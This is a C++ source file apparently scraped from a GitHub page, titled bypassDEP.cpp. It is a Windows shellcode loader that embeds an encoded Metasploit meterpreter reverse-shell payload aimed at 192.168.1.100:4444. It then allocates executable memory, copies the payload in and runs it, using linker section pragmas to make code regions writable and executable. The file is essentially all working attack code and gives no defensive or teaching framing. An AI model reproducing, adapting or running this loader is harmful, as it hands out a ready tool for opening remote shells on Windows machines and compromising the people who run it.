-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathbypassDEP.cpp
85 lines (82 loc) · 3.63 KB
/
bypassDEP.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#include <windows.h>
/*
------------------------------------------------
Autor: @mh4x0f P0cl4bs Team
-----------------------------------------------
*/
//section code permission to read to wite
#pragma section(".code",execute, read, write)
#pragma section(".codedata", read, write)
// secton native application
#pragma comment(linker,"/MERGE:.codedata=.code")
// rewrite memory
#pragma comment(linker,"/SECTION:.code,ERW")
// onde fica todas variável globais :D
// all variable global
#pragma data_seg(".codedata")
#pragma const_seg(".codedata")
#pragma code_seg(".code")
/* meterpreter 192.168.1.100 port 4444 encoded shikata_ga_nai 10 */
unsigned char shellcode[] =
"\xb8\xca\x31\x30\xe8\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x86\x31\x42\x13\x83\xc2\x04\x03\x42\xc5\xd3\xc5\x33\x1b\xca"
"\x52\xe0\x6f\x52\xe0\xd4\x57\xcd\x48\x0e\xae\xbf\x0c\x61\x4d"
"\xd9\x71\x44\xa9\xda\x08\x52\x29\x15\x91\x69\xe6\x66\x23\xfd"
"\x5e\x9a\xce\xb5\x52\xc6\x16\xc8\xf7\x2b\x86\x17\xcf\xfd\xcd"
"\x9a\xbe\xc2\xb8\x2b\x95\xd5\xc4\xba\xc8\x41\xea\x78\x3a\x9e"
"\x81\x9d\xb5\xce\xea\xc2\xa9\xb5\x2d\xe2\x09\x32\xe3\x4f\xcf"
"\xd2\x59\x70\x42\x47\x2b\x35\xe7\xb5\x03\x70\xe7\x29\x09\x76"
"\xac\x7c\x89\x65\x93\x62\x8e\x1c\x91\xfb\xf9\x73\x67\xf2\x68"
"\x6e\x06\x11\x30\xb0\x28\x89\xcc\x66\x3e\x44\x05\xfa\x8f\x50"
"\x42\x23\xb5\xa8\x29\xa2\x99\x14\xb8\x79\x67\xc7\x45\x25\x6e"
"\x1b\x56\xad\xe9\x9e\x2c\x0e\xc8\x48\xbe\xad\x02\x44\xc4\x64"
"\x5b\x85\xe9\x87\x23\xef\xd8\x47\x27\x26\xf8\x2e\x50\xde\xf1"
"\x29\x6b\x68\x3b\xc1\x41\x65\xdc\x58\x14\x85\x1e\xc5\x20\xbf"
"\xe6\xd5\xb9\xbb\x44\x68\x3f\x77\x0f\x7c\xad\xe5\xc0\x73\x06"
"\xa0\x71\x1c\xb0\x7a\x25\x31\x9c\xe5\xaf\x01\x09\x0b\x2e\xf3"
"\x9a\x18\x50\xe8\x47\x03\x7f\x25\x32\x88\xdb\x3a\x2a\x93\x12"
"\xf8\x2a\xf4\x12\xf2\x23\xa6\x98\x67\xfd\xe7\xa2\xc8\x90\xc8"
"\x9c\x72\x80\xf7\xfe\x23\x54\x6c\xd8\x64\x4a\x23\x2e\x2a\x19"
"\x09\x95\x98\xa5\x14\x01\x33\x56\xee\xd5\x62\xac\x60\x4d\xe2"
"\x98\x3b\xaf\x86\x04\x79\x61\x91\xe6\x46\x1f\x0b\xc9\x66\x63"
"\x5d\x4f\x57\x3d\x8d\x96\x1a\x64\x34\xab\xe5\xa6\x39\xd7\x92"
"\x10\x05\x41\x0b\x0b\xef\x06\xf7\xfa\x28\x67\xc2\x44\x75\xd6"
"\xef\x4f\xa0\xa2\x93\x3d\xad\x20\xb6\x19\xc4\xfa\xd7\x0e\x6b"
"\x3a\x0e\xcc\x75\xf7\xa2\xf0\x6d\x09\xc0\xf1\x37\x12\x06\x2c"
"\xa9\x69\xf6\x3e\xc5\x2d\xea\x69\x42\x22\x60\x5b\x6b\xf2\x6f"
"\x61\xe9\x93\x19\xc1\x97\x9f\xe9\x45\x03\x1b\xe8\x3f\xaa\xe5"
"\xda\xc3\x8d\x89\xd4\x5d\xf0\x7c\xc4\x4d\x40\x20\xb2\xaa\x29"
"\x40\xfd\x67\xcf\x91\x18\xe5\xb4\x75\x21\x21\x89\x71\xa1\x9a"
"\x05\xd5\x39\x48\x2d\xcf\xa1\x29\x9e\xd5\x5e\x3c\xfb\xc6\x8b"
"\xc1\xaf\x1d\x9e\x4d\x46\x05\x94\x61\xbb\x28\xb2\xe9\xff\xe5"
"\xfd\x58\xfe\x3c\xc0\xd9\x47\xaf\x79\xf5\x39\x1d\xcc\x64\x89"
"\xbc\x5b\x87\xab\x36\x26\xd5\xd3\x18\x01\x2d\xd5\xd1\xe3\xb6"
"\x0e\x37\x52\x8c\x70\x12\x9e\x67\xd9\x22\xe7\xa4\xc3\x01\x4b"
"\x7c\x43\xf9\xc1\x28\xf4\x65\xef\xb1\x53\x89\x81\x33\x09\xdc"
"\xae\x27\xf5\xa6\x36\x1b\xf9\x2d\xb7\xaf\x6d\x62\x0c\x10\xf1"
"\xfc\x3e\x07\x84\xc9\x08\x18\x91\xbd\x50\x07\xbb\x76\xb8\x0f"
"\x2d\xcc\x18\x3c\xa4";
// call windows API
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR szCmdLine, int iCmdShow) {
typedef void (*fp)();
/* alloc in heap the shellcode*/
void * heap = (void *)VirtualAlloc(
NULL,
4096,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
// copy shellcode in memory alloc
CopyMemory(heap, shellcode, sizeof shellcode);
fp func = (fp)heap;
(*func)(); // execute shellcode
return 0;
}
#pragma section(".stub", execute, read, write)
#pragma code_seg(".stub")
#pragma section(".stubdata", read, write)
#pragma comment(linker,"/MERGE:.stubdata=.stub")
#pragma data_seg(".stubdata")
#pragma const_seg(".stubdata")
#pragma code_seg(".stub")